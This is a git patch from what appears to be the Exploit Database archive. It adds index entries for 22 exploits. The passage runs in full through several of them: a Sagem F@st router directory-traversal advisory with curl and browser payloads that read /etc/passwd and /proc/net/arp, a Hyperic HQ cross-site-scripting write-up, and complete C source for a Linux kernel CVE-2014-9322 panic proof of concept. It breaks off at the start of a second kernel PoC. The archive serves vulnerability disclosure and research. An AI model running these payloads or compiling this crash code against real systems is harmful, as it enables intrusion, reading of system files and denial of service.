From b109a86d7a8fff905f49011283321f6a3186aaa6 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 6 Mar 2015 08:35:37 +0000
Subject: [PATCH] Update: 2015-03-06

22 new exploits
---
 files.csv                            |  22 ++
 platforms/hardware/webapps/36241.txt |  21 ++
 platforms/jsp/webapps/36275.txt      | 221 +++++++++++++++++
 platforms/lin_amd64/dos/36266.c      | 155 ++++++++++++
 platforms/linux/dos/36267.c          | 161 ++++++++++++
 platforms/linux/dos/36268.c          | 107 ++++++++
 platforms/linux/local/36229.py       |  48 ++++
 platforms/linux/remote/36263.rb      | 243 ++++++++++++++++++
 platforms/osx/dos/36271.py           |  43 ++++
 platforms/php/remote/36264.rb        | 354 +++++++++++++++++++++++++++
 platforms/php/webapps/36230.txt      |  37 +++
 platforms/php/webapps/36259.txt      |  11 +
 platforms/php/webapps/36265.txt      | 118 +++++++++
 platforms/php/webapps/36269.txt      |  11 +
 platforms/php/webapps/36270.txt      |   7 +
 platforms/php/webapps/36272.txt      |   9 +
 platforms/php/webapps/36273.txt      |  23 ++
 platforms/php/webapps/36277.txt      |   7 +
 platforms/php/webapps/36278.txt      |  15 ++
 platforms/php/webapps/36280.txt      |   9 +
 platforms/php/webapps/36281.txt      |   9 +
 platforms/windows/dos/36260.txt      |  58 +++++
 platforms/windows/webapps/36262.txt  | 142 +++++++++++
 23 files changed, 1831 insertions(+)
 create mode 100755 platforms/hardware/webapps/36241.txt
 create mode 100755 platforms/jsp/webapps/36275.txt
 create mode 100755 platforms/lin_amd64/dos/36266.c
 create mode 100755 platforms/linux/dos/36267.c
 create mode 100755 platforms/linux/dos/36268.c
 create mode 100755 platforms/linux/local/36229.py
 create mode 100755 platforms/linux/remote/36263.rb
 create mode 100755 platforms/osx/dos/36271.py
 create mode 100755 platforms/php/remote/36264.rb
 create mode 100755 platforms/php/webapps/36230.txt
 create mode 100755 platforms/php/webapps/36259.txt
 create mode 100755 platforms/php/webapps/36265.txt
 create mode 100755 platforms/php/webapps/36269.txt
 create mode 100755 platforms/php/webapps/36270.txt
 create mode 100755 platforms/php/webapps/36272.txt
 create mode 100755 platforms/php/webapps/36273.txt
 create mode 100755 platforms/php/webapps/36277.txt
 create mode 100755 platforms/php/webapps/36278.txt
 create mode 100755 platforms/php/webapps/36280.txt
 create mode 100755 platforms/php/webapps/36281.txt
 create mode 100755 platforms/windows/dos/36260.txt
 create mode 100755 platforms/windows/webapps/36262.txt

diff --git a/files.csv b/files.csv
index ee4797e54..2637071ab 100755
--- a/files.csv
+++ b/files.csv
@@ -32656,6 +32656,8 @@ id,file,description,date,author,platform,type,port
 36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0
 36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 'id' Parameter SQL Injection Vulnerability",2011-10-12,"BHG Security Center",php,webapps,0
 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0
+36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0
+36230,platforms/php/webapps/36230.txt,"Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability",2015-03-02,"Ibrahim Raafat",php,webapps,0
 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability",2015-03-02,Net.Edit0r,php,webapps,80
 36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0
 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability",2011-10-13,"Fredrik Widlund",multiple,dos,0
@@ -32665,6 +32667,7 @@ id,file,description,date,author,platform,type,port
 36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass Vulnerability",2011-10-17,"Deral Heiland PercX",multiple,remote,0
 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0
 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0
+36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0
 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0
 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0
 36246,platforms/multiple/remote/36246.txt,"Splunk <= 4.1.6 'segment' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Filip Palian",multiple,remote,0
@@ -32680,3 +32683,22 @@ id,file,description,date,author,platform,type,port
 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products 'file' Parameter Directory Traversal Vulnerability",2011-10-26,"Sandro Gauci",hardware,remote,0
 36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 Local Privilege Escalation Vulnerability",2011-10-26,"Buguroo Offensive Security",linux,local,0
 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0
+36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 'professor.php' Script Multiple SQL Injection Vulnerabilities",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0
+36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 Escape Sequence Stack Buffer Overflow Denial of Service Vulnerability",2011-10-28,"Marcel Bernhardt",windows,dos,0
+36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection Vulnerabilities",2015-03-04,"Brandon Perry",windows,webapps,0
+36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443
+36264,platforms/php/remote/36264.rb,"Seagate Business NAS Unauthenticated Remote Command Execution",2015-03-04,metasploit,php,remote,80
+36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80
+36266,platforms/lin_amd64/dos/36266.c,"Linux Kernel IRET Instruction #SS Fault Handling - Crash PoC",2015-03-04,"Emeric Nasi",lin_amd64,dos,0
+36267,platforms/linux/dos/36267.c,"Linux Kernel PPP-over-L2TP Socket Level Handling - Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0
+36268,platforms/linux/dos/36268.c,"Linux Kernel Associative Array Garbage Collection - Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0
+36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 'post.php' SQL Injection Vulnerability",2011-10-28,"599eme Man",php,webapps,0
+36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 'p48-search.html' Cross Site Scripting Vulnerability",2011-10-28,"599eme Man",php,webapps,0
+36271,platforms/osx/dos/36271.py,"Apple Mac OS X <= 10.6.5 And iOS <= 4.3.3 Mail Denial of Service Vulnerability",2011-10-29,shebang42,osx,dos,0
+36272,platforms/php/webapps/36272.txt,"Domain Shop 'index.php' Cross Site Scripting Vulnerability",2011-11-01,Mr.PaPaRoSSe,php,webapps,0
+36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 Multiple Remote File Include Vulnerabilities",2011-11-01,indoushka,php,webapps,0
+36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0
+36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) 'str' Parameter Cross Site Scripting Vulnerability",2011-11-01,Isfahan,php,webapps,0
+36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0
+36280,platforms/php/webapps/36280.txt,"Symphony <= 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0
+36281,platforms/php/webapps/36281.txt,"Symphony <= 2.2.3 symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0
diff --git a/platforms/hardware/webapps/36241.txt b/platforms/hardware/webapps/36241.txt
new file mode 100755
index 000000000..debab8eb8
--- /dev/null
+++ b/platforms/hardware/webapps/36241.txt
@@ -0,0 +1,21 @@
+# Title              : Sagem F@st 3304-V2 Directory Traversal Vulnerability
+# Vendor             : http://www.sagemcom.com
+# Severity           : High
+# Tested Router      : Sagem F@st 3304-V2 (3304, other versions may also be affected)
+# Date               : 2015-03-01
+# Author             : Loudiyi Mohamed
+# Contact            : Loudiyi.2010@gmail.com
+# Blog               : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
+ 
+# Vulnerability description:
+Sagem Fast is an ADSL Router using a web management interface in order to change configuration
+settings. The router is Sagem Fast is an ADSL Router using a web management interface in order
+to change configuration settings. 
+The web server of the router is vulnerable to directory traversal which allows reading files 
+by sending encoded '../' requests.
+
+The vulnerability may be tested with the following command-line:
+curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd
+Or directly from navigateur:
+http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp
diff --git a/platforms/jsp/webapps/36275.txt b/platforms/jsp/webapps/36275.txt
new file mode 100755
index 000000000..948394b8a
--- /dev/null
+++ b/platforms/jsp/webapps/36275.txt
@@ -0,0 +1,221 @@
+source: http://www.securityfocus.com/bid/50456/info
+
+Hyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities.
+
+An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. The impact of other issues is unknown.
+
+These issues affect Hyperic HQ Enterprise 4.5.1; other versions may also be affected. 
+
+Proof of Concept:
+=================
+The vulnerabilities can be exploited by remote attackers or local & low privileged user accounts.
+For demonstration or reproduce ...
+
+1.1
+Code Review: HQ Roles  [IVE - Persistent]
+
+<td width="30%" class="BlockContent">
+<!-- END VIEW MODE --> 
+</td></tr><tr valign="top">
+<td width="20%" class="BlockLabel">Dashboard Name:</td>
+<td width="30%" class="BlockContent">
+<span id="dashboardString">New Role Dashboard</span></td>
+<td width="20%" class="BlockLabel"></td>
+<td width="30%" class="BlockContent"></td></tr></table>
+<!--  /  -->
+
+
+Code Review: java.security.krb5.kdc   Module: HQ Health / HQ Process Information & Diagnostics  [IVE - Persistent]
+
+- java.rmi.server.codebase = http://h1461735:9093/ 
+- java.rmi.server.hostname = h1461735 
+- java.runtime.name = Java(TM) SE Runtime Environment 
+- java.runtime.version = 1.6.0_13-b03 
+- java.security.krb5.kdc = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> 
+- java.security.krb5.realm = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> 
+- java.specification.name = Java Platform API Specification 
+- java.specification.vendor = Sun Microsystems Inc. 
+- java.specification.version = 1.6 
+- java.vendor = Sun Microsystems Inc. 
+
+.../PoC/printReport(poc).hqu
+
+
+
+Code Review: Browse - Monitor - Indikators  [IVE - Persistent]
+
+
+hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
+hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
+</script>
+<title>
+HQ View Application Monitor Current Health - >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
+</title>
+<script type="text/javascript">
+var onloads = [];
+function initOnloads() {
+            if (arguments.callee.done) return;
+
+... or
+
+  hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
+  hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
+</script>
+  <title>
+   >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
+  </title>
+    <script type="text/javascript">
+        var onloads = [];
+         function initOnloads() {
+        
+            if (arguments.callee.done) return;
+            arguments.callee.done = true;
+           if(typeof(_timer)!="undefined") clearInterval(_timer);
+           for ( var i = 0 ; i < onloads.length ; i++ )
+             onloads[i]();
+
+
+
+Code Review: Applications ? All Applications - Topic  [IVE - Persistent]
+
+<li class="hasSubmenu"><a href="">Recently Viewed</a><div><ul>
+<li><a href="/Resource.do?eid=4:10001">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>;
+</a></li></ul></div></li></ul></div></li><li id="analyzeTab"><a href="#">Analyze</a><div><ul>
+
+
+
+Code Review: General Properties - Inventory over Exception-Handling [IVE - Persistent]
+
+<div id="exception27" style="visibility:hidden">javax.servlet.jsp.JspTagException: javax.servlet.jsp.JspException: 
+An error occurred while evaluating custom action attribute "sort" with value "${param.scs}": An exception occured trying to convert 
+String ">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>" to type "java.lang.Integer"
+  at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1456)
+  at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1438)
+  at org.hyperic.hq.ui.taglib.display.TableTag.evaluateAttributes(TableTag.java:1517)
+  at org.hyperic.hq.ui.taglib.display.TableTag.doStartTag(TableTag.java:226)
+  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_display_005ftable_005f0(Unknown Source)
+  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_html_005fform_005f0(Unknown Source)
+  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspService(Unknown Source)
+  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
+  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
+  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
+  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
+  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
+  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
+  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
+  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
+  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
+  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
+  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
+  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
+  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
+  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
+  at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspx_meth_tiles_005finsert_005f8(Unknown Source)
+  at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspService(Unknown Source)
+  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
+  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
+  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
+  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
+  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
+  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
+  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
+  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
+  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
+  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
+  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
+  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
+  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
+  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
+  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_tiles_005finsert_005f0(Unknown Source)
+  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f1(Unknown Source)
+  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f0(Unknown Source)
+  at org.apache.jsp.portal.ColumnsLayout_jsp._jspService(Unknown Source)
+  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
+  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
+  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
+  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
+  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
+  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
+  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
+  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
+  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
+  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
+  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
+  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
+  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
+  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
+  at org.apache.jsp.portal.MainLayout_jsp._jspx_meth_tiles_005finsert_005f2(Unknown Source)
+  at org.apache.jsp.portal.MainLayout_jsp._jspService(Unknown Source)
+  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
+  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
+  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
+  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
+  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
+  at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:445)
+  at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:379)
+  at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:292)
+  at org.apache.struts.action.RequestProcessor.doForward(RequestProcessor.java:1085)
+  at org.apache.struts.tiles.TilesRequestProcessor.doForward(TilesRequestProcessor.java:263)
+  at org.apache.struts.tiles.TilesRequestProcessor.processTilesDefinition(TilesRequestProcessor.java:239)
+  at org.apache.struts.tiles.TilesRequestProcessor.internalModuleRelativeForward(TilesRequestProcessor.java:341)
+  at org.apache.struts.action.RequestProcessor.processForward(RequestProcessor.java:572)
+  at org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:221)
+  at org.apache.struts.action.ActionServlet.process(ActionServlet.java:1196)
+  at org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:414)
+  at javax.servlet.http.HttpServlet.service(HttpServlet.java:690)
+  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
+  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
+  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
+  at org.hyperic.hq.ui.AuthenticationFilter.doFilter(AuthenticationFilter.java:167)
+  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
+  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
+  at org.hyperic.hibernate.filter.SessionFilter$1.run(SessionFilter.java:59)
+  at org.hyperic.hq.hibernate.SessionManager.runInSessionInternal(SessionManager.java:79)
+  at org.hyperic.hq.hibernate.SessionManager.runInSession(SessionManager.java:68)
+  at org.hyperic.hibernate.filter.SessionFilter.doFilter(SessionFilter.java:57)
+  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
+  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
+  at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:164)
+  at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:141)
+  at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:90)
+  at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:417)
+  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
+  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
+  at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
+  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
+  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
+  at org.hyperic.hq.product.servlet.filter.JMXFilter.doFilter(JMXFilter.java:322)
+  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
+  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
+  at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:230)
+  at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:175)
+  at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:182)
+  at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:84)
+  at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
+  at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
+  at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:157)
+  at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
+  at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:262)
+  at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:844)
+  at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)
+  at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:446)
+  at java.lang.Thread.run(Unknown Source) </div>
+
+
+1.2
+References:
+http://www.example.com/admin/role/RoleAdmin.do?mode=new
+http://www.example.com/hqu/health/health/printReport.hqu
+http://www.example.com/Resource.do?eid=4:10001
+http://www.example.com/ResourceHub.do
+http://www.example.com/resource/application/Inventory.do?mode=view&accord=3&eid=4:10001&sos=dec&scs=
+
+
+
+
+Code Review: Escalation Schemes Configuration [XSS]
+
+http://www.example.com/admin/config/Config.do?mode=escalate&escId=[INCLUDE CLIENT_SIDE SCRIPTCODE HERE!!!]
+
+References:
+http://www.example.com/admin/config/Config.do?mode=escalate&escId=
\ No newline at end of file
diff --git a/platforms/lin_amd64/dos/36266.c b/platforms/lin_amd64/dos/36266.c
new file mode 100755
index 000000000..bc492ce9d
--- /dev/null
+++ b/platforms/lin_amd64/dos/36266.c
@@ -0,0 +1,155 @@
+/* ----------------------------------------------------------------------------------------------------
+ * cve-2014-9322_poc.c
+ * 
+ * arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
+ * properly handle faults associated with the Stack Segment (SS) segment
+ * register, which allows local users to gain privileges by triggering an IRET
+ * instruction that leads to access to a GS Base address from the wrong space.
+ * 
+ * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
+ * 
+ * I have no merit to writing this poc, I just implemented first part of Rafal Wojtczuk article (this guy is a genius!)
+ * More info at : http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
+ * 
+ * 
+ * Compile with gcc -fno-stack-protector -Wall -o cve-2014-9322_poc cve-2014-9322_poc.c  -lpthread
+ * 
+ * Emeric Nasi - www.sevagas.com
+ *-----------------------------------------------------------------------------------------------------*/
+ 
+  // Only works on x86_64 platform
+ #ifdef __x86_64__
+ 
+/* -----------------------   Includes ----------------------------*/
+#define _GNU_SOURCE
+#include <stdio.h> 
+#include <stdlib.h>
+#include <time.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <sys/mman.h>
+#include <asm/ldt.h>
+#include <pthread.h>
+#include <sys/time.h>
+#include <inttypes.h>
+#include <stdbool.h>
+#include <errno.h>
+#include <sys/user.h>
+
+
+
+/* -----------------------   definitions ----------------------------*/
+
+
+#define TARGET_KERNEL_MIN "3.0.0"
+#define TARGET_KERNEL_MAX "3.17.4"
+#define EXPLOIT_NAME "cve-2014-9322"
+#define EXPLOIT_TYPE DOS
+
+
+#define FALSE_SS_BASE  0x10000UL
+#define MAP_SIZE    0x10000
+
+
+/* -----------------------   Global variables ----------------------------*/
+
+
+struct user_desc new_stack_segment;
+
+
+/* -----------------------   functions ----------------------------*/
+
+
+/**
+ * Creates a new segment in Local Descriptor Table
+ */
+static bool add_ldt(struct user_desc *desc, const char *name)
+{
+  if (syscall(SYS_modify_ldt, 1, desc, sizeof(struct user_desc)) == 0) 
+  {
+    return true;
+  } 
+  else 
+  {
+    printf("[cve_2014_9322 error]: Failed to create %s segment\n", name);
+    printf("modify_ldt failed, %s\n", strerror(errno));
+    return false;
+  }
+}
+
+
+int FLAG = 0;
+
+void * segManipulatorThread(void * none)
+{
+  new_stack_segment.entry_number    = 0x12;
+  new_stack_segment.base_addr       = 0x10000;
+  new_stack_segment.limit           = 0xffff;
+  new_stack_segment.seg_32bit       = 1;
+  new_stack_segment.contents        = MODIFY_LDT_CONTENTS_STACK; /* Data, grow-up */
+  new_stack_segment.read_exec_only  = 0;
+  new_stack_segment.limit_in_pages  = 0;
+  new_stack_segment.seg_not_present = 0;
+  new_stack_segment.useable         = 0;
+  new_stack_segment.lm = 0;
+  
+  // Create a new stack segment
+  add_ldt(&new_stack_segment, "newSS");
+  
+  // Wait for main thread to use new stack segment
+  sleep(3);  
+
+  // Invalidate stack segment 
+  new_stack_segment.seg_not_present = 1;
+  add_ldt(&new_stack_segment, "newSS disable");
+  FLAG = 1;
+  sleep(15);
+  
+  return NULL;
+}
+
+/**
+ * DOS poc for cve_2014_9322 vulnerability
+ */
+int main()
+{
+
+  pthread_t thread1;
+  uint8_t *code;
+  
+  printf("[cve_2014_9322]: Preparing to exploit.\n");
+  
+  // map area for false SS
+  code = (uint8_t *)mmap((void *)FALSE_SS_BASE, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
+  if (code != (uint8_t *) FALSE_SS_BASE) 
+  {
+    fprintf(stderr, "[cve_2014_9322 Error]: Unable to map memory at address: %lu\n", FALSE_SS_BASE);
+    return -1;
+  }
+   
+    printf("[cve_2014_9322]:  Panic!\n");
+  if(pthread_create(&thread1, NULL, segManipulatorThread, NULL)!= 0)
+  {
+    perror("[cve_2014_9322 error]: pthread_create");
+    return false;  
+  }
+  
+  // Wait for segManipulatorThread to create new stack segment
+  sleep(1);
+
+    // Set  stack segment to newly created one in segManipulatorThread
+  asm volatile ("mov %0, %%ss;"
+    :        
+    :"r" (0x97)
+  );
+  
+  while(FLAG == 0){};
+  sleep(4);
+
+  return 0;
+}
+
+
+#endif // __x86_64__
\ No newline at end of file
diff --git a/platforms/linux/dos/36267.c b/platforms/linux/dos/36267.c
new file mode 100755
index 000000000..8b6a73b82
--- /dev/null
+++ b/platforms/linux/dos/36267.c
@@ -0,0 +1,161 @@
+/* ----------------------------------------------------------------------------------------------------
+ * cve-2014-4943_poc.c
+ * 
+ * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure 
+ * differences between an l2tp socket and an inet socket. 
+ * 
+ * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
+ * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.
+ * There are some kernel structures that can be overwriten but I didn't manage to find the ultimate trick to at least point back to userland.
+ * If seems guys at immunuty found a way using race condition.
+ *
+ * 
+ * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c  
+ * 
+ * Emeric Nasi - www.sevagas.com
+ *-----------------------------------------------------------------------------------------------------*/
+ 
+
+ 
+/* -----------------------   Includes ----------------------------*/
+
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
